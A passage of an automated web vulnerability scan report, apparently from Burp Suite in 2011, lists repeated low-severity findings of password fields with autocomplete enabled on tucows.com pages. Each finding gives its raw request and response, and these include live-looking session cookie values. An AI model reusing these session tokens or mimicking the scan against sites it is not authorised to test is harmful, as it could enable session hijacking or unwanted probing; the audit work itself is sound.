Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.8. http://www.tucows.com/affiliate/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.9. http://www.tucows.com/author_ratings.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.10. http://www.tucows.com/author_ratings.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.11. http://www.tucows.com/contact.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.12. http://www.tucows.com/contact.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.13. http://www.tucows.com/images/newassets/contact.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.14. http://www.tucows.com/images/newassets/contact.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.15. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.16. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.17. http://www.tucows.com/images/newassets/includes/js/aalib.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.18. http://www.tucows.com/images/newassets/includes/js/aalib.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.19. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.20. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

